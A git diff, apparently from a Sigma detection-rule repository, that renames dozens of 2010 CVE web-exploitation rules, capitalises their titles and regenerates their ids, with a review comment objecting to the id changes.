 ...-1495.yaml => web_cve-2010-1495_exploitation_attempt.yaml} | 4 ++--
 ...-1532.yaml => web_cve-2010-1532_exploitation_attempt.yaml} | 4 ++--
 ...-1533.yaml => web_cve-2010-1533_exploitation_attempt.yaml} | 4 ++--
 ...-1534.yaml => web_cve-2010-1534_exploitation_attempt.yaml} | 4 ++--
 ...-1535.yaml => web_cve-2010-1535_exploitation_attempt.yaml} | 4 ++--
 ...-1601.yaml => web_cve-2010-1601_exploitation_attempt.yaml} | 4 ++--
 ...-1602.yaml => web_cve-2010-1602_exploitation_attempt.yaml} | 4 ++--
 ...-1607.yaml => web_cve-2010-1607_exploitation_attempt.yaml} | 4 ++--
 ...-1657.yaml => web_cve-2010-1657_exploitation_attempt.yaml} | 4 ++--
 ...-1659.yaml => web_cve-2010-1659_exploitation_attempt.yaml} | 4 ++--
 ...-1714.yaml => web_cve-2010-1714_exploitation_attempt.yaml} | 4 ++--
 ...-1717.yaml => web_cve-2010-1717_exploitation_attempt.yaml} | 4 ++--
 ...-1718.yaml => web_cve-2010-1718_exploitation_attempt.yaml} | 4 ++--
 ...-1719.yaml => web_cve-2010-1719_exploitation_attempt.yaml} | 4 ++--
 ...-1722.yaml => web_cve-2010-1722_exploitation_attempt.yaml} | 4 ++--
 ...-1875.yaml => web_cve-2010-1875_exploitation_attempt.yaml} | 4 ++--
 ...-1953.yaml => web_cve-2010-1953_exploitation_attempt.yaml} | 4 ++--
 ...-1954.yaml => web_cve-2010-1954_exploitation_attempt.yaml} | 4 ++--
 ...-1955.yaml => web_cve-2010-1955_exploitation_attempt.yaml} | 4 ++--
 ...-1956.yaml => web_cve-2010-1956_exploitation_attempt.yaml} | 4 ++--
 ...-1979.yaml => web_cve-2010-1979_exploitation_attempt.yaml} | 4 ++--
 ...-1980.yaml => web_cve-2010-1980_exploitation_attempt.yaml} | 4 ++--
 ...-1981.yaml => web_cve-2010-1981_exploitation_attempt.yaml} | 4 ++--
 ...-1983.yaml => web_cve-2010-1983_exploitation_attempt.yaml} | 4 ++--
 ...-2033.yaml => web_cve-2010-2033_exploitation_attempt.yaml} | 4 ++--
 ...-2034.yaml => web_cve-2010-2034_exploitation_attempt.yaml} | 4 ++--
 ...-2035.yaml => web_cve-2010-2035_exploitation_attempt.yaml} | 4 ++--
 ...-2036.yaml => web_cve-2010-2036_exploitation_attempt.yaml} | 4 ++--
 ...-2122.yaml => web_cve-2010-2122_exploitation_attempt.yaml} | 4 ++--
 ...-2259.yaml => web_cve-2010-2259_exploitation_attempt.yaml} | 4 ++--
 ...-2307.yaml => web_cve-2010-2307_exploitation_attempt.yaml} | 4 ++--
 ...-2682.yaml => web_cve-2010-2682_exploitation_attempt.yaml} | 4 ++--
 ...-2861.yaml => web_cve-2010-2861_exploitation_attempt.yaml} | 4 ++--
 ...-2920.yaml => web_cve-2010-2920_exploitation_attempt.yaml} | 4 ++--
 ...-3426.yaml => web_cve-2010-3426_exploitation_attempt.yaml} | 4 ++--
 ...-4231.yaml => web_cve-2010-4231_exploitation_attempt.yaml} | 4 ++--
 ...-4617.yaml => web_cve-2010-4617_exploitation_attempt.yaml} | 4 ++--
 ...-5278.yaml => web_cve-2010-5278_exploitation_attempt.yaml} | 4 ++--
 61 files changed, 122 insertions(+), 122 deletions(-)
 rename rules/web/{web_cve-2010-0943.yaml => web_cve-2010-0943_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-0944.yaml => web_cve-2010-0944_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-0985.yaml => web_cve-2010-0985_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1219.yaml => web_cve-2010-1219_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-1304.yaml => web_cve-2010-1304_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1305.yaml => web_cve-2010-1305_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1306.yaml => web_cve-2010-1306_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-1307.yaml => web_cve-2010-1307_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-1308.yaml => web_cve-2010-1308_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-1312.yaml => web_cve-2010-1312_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1313.yaml => web_cve-2010-1313_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1314.yaml => web_cve-2010-1314_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-1345.yaml => web_cve-2010-1345_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1353.yaml => web_cve-2010-1353_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-1354.yaml => web_cve-2010-1354_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-1470.yaml => web_cve-2010-1470_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1471.yaml => web_cve-2010-1471_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1472.yaml => web_cve-2010-1472_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-1473.yaml => web_cve-2010-1473_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1474.yaml => web_cve-2010-1474_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1475.yaml => web_cve-2010-1475_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1476.yaml => web_cve-2010-1476_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1494.yaml => web_cve-2010-1494_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-1495.yaml => web_cve-2010-1495_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-1532.yaml => web_cve-2010-1532_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1533.yaml => web_cve-2010-1533_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-1534.yaml => web_cve-2010-1534_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-1535.yaml => web_cve-2010-1535_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1601.yaml => web_cve-2010-1601_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-1602.yaml => web_cve-2010-1602_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1607.yaml => web_cve-2010-1607_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1657.yaml => web_cve-2010-1657_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-1659.yaml => web_cve-2010-1659_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1714.yaml => web_cve-2010-1714_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-1717.yaml => web_cve-2010-1717_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1718.yaml => web_cve-2010-1718_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1719.yaml => web_cve-2010-1719_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1722.yaml => web_cve-2010-1722_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1875.yaml => web_cve-2010-1875_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1953.yaml => web_cve-2010-1953_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1954.yaml => web_cve-2010-1954_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1955.yaml => web_cve-2010-1955_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1956.yaml => web_cve-2010-1956_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1979.yaml => web_cve-2010-1979_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1980.yaml => web_cve-2010-1980_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-1981.yaml => web_cve-2010-1981_exploitation_attempt.yaml} (89%)
 rename rules/web/{web_cve-2010-1983.yaml => web_cve-2010-1983_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-2033.yaml => web_cve-2010-2033_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-2034.yaml => web_cve-2010-2034_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-2035.yaml => web_cve-2010-2035_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-2036.yaml => web_cve-2010-2036_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-2122.yaml => web_cve-2010-2122_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-2259.yaml => web_cve-2010-2259_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-2307.yaml => web_cve-2010-2307_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-2682.yaml => web_cve-2010-2682_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-2861.yaml => web_cve-2010-2861_exploitation_attempt.yaml} (91%)
 rename rules/web/{web_cve-2010-2920.yaml => web_cve-2010-2920_exploitation_attempt.yaml} (90%)
 rename rules/web/{web_cve-2010-3426.yaml => 
web_cve-2010-3426_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-4231.yaml => web_cve-2010-4231_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-4617.yaml => web_cve-2010-4617_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-5278.yaml => web_cve-2010-5278_exploitation_attempt.yaml} (90%)
diff --git a/rules/web/web_cve-2010-0943.yaml b/rules/web/web_cve-2010-0943_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-0943.yaml
rename to rules/web/web_cve-2010-0943_exploitation_attempt.yaml
index 52d23982..e36f9ca0 100644
--- a/rules/web/web_cve-2010-0943.yaml
+++ b/rules/web/web_cve-2010-0943_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-0943 exploitation attempt
-id: 7341b3ab-aed8-470b-b3b3-baee54357b21
+title: CVE-2010-0943 Exploitation Attempt
+id: 3b8a0723-2e41-43ef-b56a-0ebf5859871c
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-0944.yaml b/rules/web/web_cve-2010-0944_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-0944.yaml
rename to rules/web/web_cve-2010-0944_exploitation_attempt.yaml
index 3bcd121b..caf28629 100644
--- a/rules/web/web_cve-2010-0944.yaml
+++ b/rules/web/web_cve-2010-0944_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-0944 exploitation attempt
-id: 99eb6dd1-7eef-4210-862c-a4289b0eb3c1
+title: CVE-2010-0944 Exploitation Attempt
+id: 9a6621c8-26ce-4fa1-a081-5092a31df9f1
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-0985.yaml b/rules/web/web_cve-2010-0985_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-0985.yaml
rename to rules/web/web_cve-2010-0985_exploitation_attempt.yaml
index 13e1971a..41d2adcf 100644
--- a/rules/web/web_cve-2010-0985.yaml
+++ b/rules/web/web_cve-2010-0985_exploitation_attempt.yaml
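Review bot: The rule's `id` is regenerated together with the rename (`-id: 7341b3ab-aed8-470b-b3b3-baee54357b21` becomes `+id: 3b8a0723-2e41-43ef-b56a-0ebf5859871c`), although the only other change to the rule is the capitalization of `title:`. In Sigma the `id` UUID is conventionally the stable handle that deployed detections, `related:` references and tuning or suppression lists are keyed on, so replacing it turns a cosmetic rename into a brand-new rule from a consumer's point of view and orphans any existing references to the old id. Unless the new UUIDs are deliberate (for example because the old ones collided with other rules), I would keep the original `id:` line and change only `title:` and the filename; if they are deliberate, the commit message should say why. The same pattern repeats for every renamed rule file in this commit.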
@@ -1,5 +1,5 @@
-title: CVE-2010-0985 exploitation attempt
-id: 299f62c1-9e8a-43cc-b018-98d469f5654b
+title: CVE-2010-0985 Exploitation Attempt
+id: 65eb9e0e-d8ea-4dbb-bdb1-8a7bfe726218
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1219.yaml b/rules/web/web_cve-2010-1219_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-1219.yaml
rename to rules/web/web_cve-2010-1219_exploitation_attempt.yaml
index 741d57a3..70470533 100644
--- a/rules/web/web_cve-2010-1219.yaml
+++ b/rules/web/web_cve-2010-1219_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1219 exploitation attempt
-id: c72b9df0-2e24-4c59-a18d-2ce9f309011c
+title: CVE-2010-1219 Exploitation Attempt
+id: 5c13b413-1c5d-471e-b5d0-502d67c2cfff
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1304.yaml b/rules/web/web_cve-2010-1304_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1304.yaml
rename to rules/web/web_cve-2010-1304_exploitation_attempt.yaml
index 62c8e768..e90d45b9 100644
--- a/rules/web/web_cve-2010-1304.yaml
+++ b/rules/web/web_cve-2010-1304_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1304 exploitation attempt
-id: d43a3260-6661-4963-ae51-1516b410eab4
+title: CVE-2010-1304 Exploitation Attempt
+id: b9f646f1-1e8d-4213-a122-e8cfb2526f7e
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1305.yaml b/rules/web/web_cve-2010-1305_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1305.yaml
rename to rules/web/web_cve-2010-1305_exploitation_attempt.yaml
index ac18cb0a..e1fd2002 100644
--- a/rules/web/web_cve-2010-1305.yaml
+++ b/rules/web/web_cve-2010-1305_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1305 exploitation attempt
-id: 4ad4e3e9-c2ec-4f11-ae69-686317089de1
+title: CVE-2010-1305 Exploitation Attempt
+id: b80d67c0-e544-463e-8db0-cfa6fd1062c7
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1306.yaml b/rules/web/web_cve-2010-1306_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-1306.yaml
rename to rules/web/web_cve-2010-1306_exploitation_attempt.yaml
index 8efdc7f9..b3c45a34 100644
--- a/rules/web/web_cve-2010-1306.yaml
+++ b/rules/web/web_cve-2010-1306_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1306 exploitation attempt
-id: 6eef2e17-dda2-4c9d-8e1f-9f28d02cbb68
+title: CVE-2010-1306 Exploitation Attempt
+id: 18655982-0c25-41ca-99a9-66c081e5c28e
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1307.yaml b/rules/web/web_cve-2010-1307_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-1307.yaml
rename to rules/web/web_cve-2010-1307_exploitation_attempt.yaml
index 15558f07..a0c1b093 100644
--- a/rules/web/web_cve-2010-1307.yaml
+++ b/rules/web/web_cve-2010-1307_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1307 exploitation attempt
-id: 57eb5063-d907-440a-8194-6a304a2c33dc
+title: CVE-2010-1307 Exploitation Attempt
+id: 1f6127b7-58d0-428e-afd6-3daa7093f500
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1308.yaml b/rules/web/web_cve-2010-1308_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-1308.yaml
rename to rules/web/web_cve-2010-1308_exploitation_attempt.yaml
index bf0e78b5..5e7dfeb6 100644
--- a/rules/web/web_cve-2010-1308.yaml
+++ b/rules/web/web_cve-2010-1308_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1308 exploitation attempt
-id: 2ab1d26f-292d-48ef-b821-30000ca2d796
+title: CVE-2010-1308 Exploitation Attempt
+id: e7fa765b-d565-42e4-b03e-44a52a25c00a
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1312.yaml b/rules/web/web_cve-2010-1312_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1312.yaml
rename to rules/web/web_cve-2010-1312_exploitation_attempt.yaml
index 8dff6589..4d863fd3 100644
--- a/rules/web/web_cve-2010-1312.yaml
+++ b/rules/web/web_cve-2010-1312_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1312 exploitation attempt
-id: 72d483b1-ef4e-4da4-a56b-d388d5fc55e4
+title: CVE-2010-1312 Exploitation Attempt
+id: ffb67143-f136-490b-a593-abc36e0a2f44
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1313.yaml b/rules/web/web_cve-2010-1313_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1313.yaml
rename to rules/web/web_cve-2010-1313_exploitation_attempt.yaml
index 6722ac48..d132790f 100644
--- a/rules/web/web_cve-2010-1313.yaml
+++ b/rules/web/web_cve-2010-1313_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1313 exploitation attempt
-id: a9cfe674-5625-47c0-aa7b-ed19fb5aebc1
+title: CVE-2010-1313 Exploitation Attempt
+id: 73c88bfc-5e2a-4fac-b2b2-01b29b565d09
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1314.yaml b/rules/web/web_cve-2010-1314_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-1314.yaml
rename to rules/web/web_cve-2010-1314_exploitation_attempt.yaml
index 37a26d24..57b4b947 100644
--- a/rules/web/web_cve-2010-1314.yaml
+++ b/rules/web/web_cve-2010-1314_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1314 exploitation attempt
-id: c54f2a94-b8eb-4b33-a430-f219b97a85e1
+title: CVE-2010-1314 Exploitation Attempt
+id: bab4e9de-2dab-4471-914b-319ddf29735f
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1345.yaml b/rules/web/web_cve-2010-1345_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1345.yaml
rename to rules/web/web_cve-2010-1345_exploitation_attempt.yaml
index b26bd3bb..1a75fecb 100644
--- a/rules/web/web_cve-2010-1345.yaml
+++ b/rules/web/web_cve-2010-1345_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1345 exploitation attempt
-id: a14d080c-2aa0-4d7b-bffd-06f0e325bd0c
+title: CVE-2010-1345 Exploitation Attempt
+id: 8e52016c-f42b-4d53-9812-5079fa88bb9a
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1353.yaml b/rules/web/web_cve-2010-1353_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-1353.yaml
rename to rules/web/web_cve-2010-1353_exploitation_attempt.yaml
index 35fc5a28..978f2bd2 100644
--- a/rules/web/web_cve-2010-1353.yaml
+++ b/rules/web/web_cve-2010-1353_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1353 exploitation attempt
-id: 9506788c-d0d6-4671-92b5-61a07cd5a056
+title: CVE-2010-1353 Exploitation Attempt
+id: 58e30700-499a-4d21-9c7b-8727e5f8b6e7
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1354.yaml b/rules/web/web_cve-2010-1354_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-1354.yaml
rename to rules/web/web_cve-2010-1354_exploitation_attempt.yaml
index c6044615..86e14aa8 100644
--- a/rules/web/web_cve-2010-1354.yaml
+++ b/rules/web/web_cve-2010-1354_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1354 exploitation attempt
-id: bf6bdfcf-7229-4812-8188-9c778d97ed63
+title: CVE-2010-1354 Exploitation Attempt
+id: 9d0cfe31-7ead-4c4c-8b33-b77c2a42ca24
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1470.yaml b/rules/web/web_cve-2010-1470_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1470.yaml
rename to rules/web/web_cve-2010-1470_exploitation_attempt.yaml
index 618ab28d..a3480662 100644
--- a/rules/web/web_cve-2010-1470.yaml
+++ b/rules/web/web_cve-2010-1470_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1470 exploitation attempt
-id: 2b631e08-2471-4b98-a385-f420ebf1f406
+title: CVE-2010-1470 Exploitation Attempt
+id: 3dcb67ad-1b33-4721-8386-7cfccd0e3684
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1471.yaml b/rules/web/web_cve-2010-1471_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1471.yaml
rename to rules/web/web_cve-2010-1471_exploitation_attempt.yaml
index 6e082197..8043e1a0 100644
--- a/rules/web/web_cve-2010-1471.yaml
+++ b/rules/web/web_cve-2010-1471_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1471 exploitation attempt
-id: cb214df9-5948-4967-ba0b-4a5ad197313e
+title: CVE-2010-1471 Exploitation Attempt
+id: ae585c7e-f75e-4b76-b7cd-a7c3eed7065f
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1472.yaml b/rules/web/web_cve-2010-1472_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-1472.yaml
rename to rules/web/web_cve-2010-1472_exploitation_attempt.yaml
index cb94d57c..b85aaaea 100644
--- a/rules/web/web_cve-2010-1472.yaml
+++ b/rules/web/web_cve-2010-1472_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1472 exploitation attempt
-id: 9878af5a-91d9-474f-b4ff-4874db061c90
+title: CVE-2010-1472 Exploitation Attempt
+id: 7472bddd-70cf-409b-8cdd-30c134bcda60
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1473.yaml b/rules/web/web_cve-2010-1473_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1473.yaml
rename to rules/web/web_cve-2010-1473_exploitation_attempt.yaml
index a7824e77..1c46d760 100644
--- a/rules/web/web_cve-2010-1473.yaml
+++ b/rules/web/web_cve-2010-1473_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1473 exploitation attempt
-id: 09fe8c14-2dd6-4c16-9610-54e9762acd81
+title: CVE-2010-1473 Exploitation Attempt
+id: 2be15734-06fe-4383-8ee4-721d4f8b0a70
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1474.yaml b/rules/web/web_cve-2010-1474_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1474.yaml
rename to rules/web/web_cve-2010-1474_exploitation_attempt.yaml
index 7d7dc15c..83bf15da 100644
--- a/rules/web/web_cve-2010-1474.yaml
+++ b/rules/web/web_cve-2010-1474_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1474 exploitation attempt
-id: 7d738208-638c-4e01-a694-b507cae881a6
+title: CVE-2010-1474 Exploitation Attempt
+id: b68d5d20-e6ca-425a-9681-93e924c2918b
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1475.yaml b/rules/web/web_cve-2010-1475_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1475.yaml
rename to rules/web/web_cve-2010-1475_exploitation_attempt.yaml
index 4f733e47..9806d633 100644
--- a/rules/web/web_cve-2010-1475.yaml
+++ b/rules/web/web_cve-2010-1475_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1475 exploitation attempt
-id: c9db721a-f2c1-4e8a-8f6a-b31aa0e51374
+title: CVE-2010-1475 Exploitation Attempt
+id: 11c50fbe-f54a-4c32-a0ae-9d3ab2b0f547
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1476.yaml b/rules/web/web_cve-2010-1476_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1476.yaml
rename to rules/web/web_cve-2010-1476_exploitation_attempt.yaml
index 17650b59..fc7dcc00 100644
--- a/rules/web/web_cve-2010-1476.yaml
+++ b/rules/web/web_cve-2010-1476_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1476 exploitation attempt
-id: 65239f96-f508-4941-b537-7837471ddcad
+title: CVE-2010-1476 Exploitation Attempt
+id: cc5df87f-99ed-486a-8805-d8b97c5bd5bb
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1494.yaml b/rules/web/web_cve-2010-1494_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-1494.yaml
rename to rules/web/web_cve-2010-1494_exploitation_attempt.yaml
index bc6b7544..e492dff6 100644
--- a/rules/web/web_cve-2010-1494.yaml
+++ b/rules/web/web_cve-2010-1494_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1494 exploitation attempt
-id: 2ab0992e-1f93-499b-b1e6-580b651c151e
+title: CVE-2010-1494 Exploitation Attempt
+id: 82fc453a-8032-444e-9801-e6ad7b3e3a9c
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1495.yaml b/rules/web/web_cve-2010-1495_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-1495.yaml
rename to rules/web/web_cve-2010-1495_exploitation_attempt.yaml
index 820bb00c..8b5b8588 100644
--- a/rules/web/web_cve-2010-1495.yaml
+++ b/rules/web/web_cve-2010-1495_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1495 exploitation attempt
-id: 16173107-1da6-4bb0-884c-0113ca1bd22c
+title: CVE-2010-1495 Exploitation Attempt
+id: eede38ab-67a5-47cd-a0e4-65e82824378d
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1532.yaml b/rules/web/web_cve-2010-1532_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1532.yaml
rename to rules/web/web_cve-2010-1532_exploitation_attempt.yaml
index 3b477e4e..bd2e252a 100644
--- a/rules/web/web_cve-2010-1532.yaml
+++ b/rules/web/web_cve-2010-1532_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1532 exploitation attempt
-id: b0caca18-cbcd-4e57-8d26-5aa5ab1dae90
+title: CVE-2010-1532 Exploitation Attempt
+id: 7185db2e-b76b-4a9f-b157-51a7f799de43
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1533.yaml b/rules/web/web_cve-2010-1533_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-1533.yaml
rename to rules/web/web_cve-2010-1533_exploitation_attempt.yaml
index 989feccd..1e779cd7 100644
--- a/rules/web/web_cve-2010-1533.yaml
+++ b/rules/web/web_cve-2010-1533_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1533 exploitation attempt
-id: 900bac77-29fa-47d7-a2cc-a2b259e5aa34
+title: CVE-2010-1533 Exploitation Attempt
+id: 4f6c4eef-bd44-4d25-8a4a-7f84a1748ec6
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1534.yaml b/rules/web/web_cve-2010-1534_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-1534.yaml
rename to rules/web/web_cve-2010-1534_exploitation_attempt.yaml
index 71b30ef2..1649ce5f 100644
--- a/rules/web/web_cve-2010-1534.yaml
+++ b/rules/web/web_cve-2010-1534_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1534 exploitation attempt
-id: 8315e276-a65f-4617-a32b-668d19b0dcf2
+title: CVE-2010-1534 Exploitation Attempt
+id: 25de4419-cce2-4b62-8204-8a4e38114c09
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1535.yaml b/rules/web/web_cve-2010-1535_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1535.yaml
rename to rules/web/web_cve-2010-1535_exploitation_attempt.yaml
index 6c1045d0..ce87bdec 100644
--- a/rules/web/web_cve-2010-1535.yaml
+++ b/rules/web/web_cve-2010-1535_exploitation_attempt.yaml
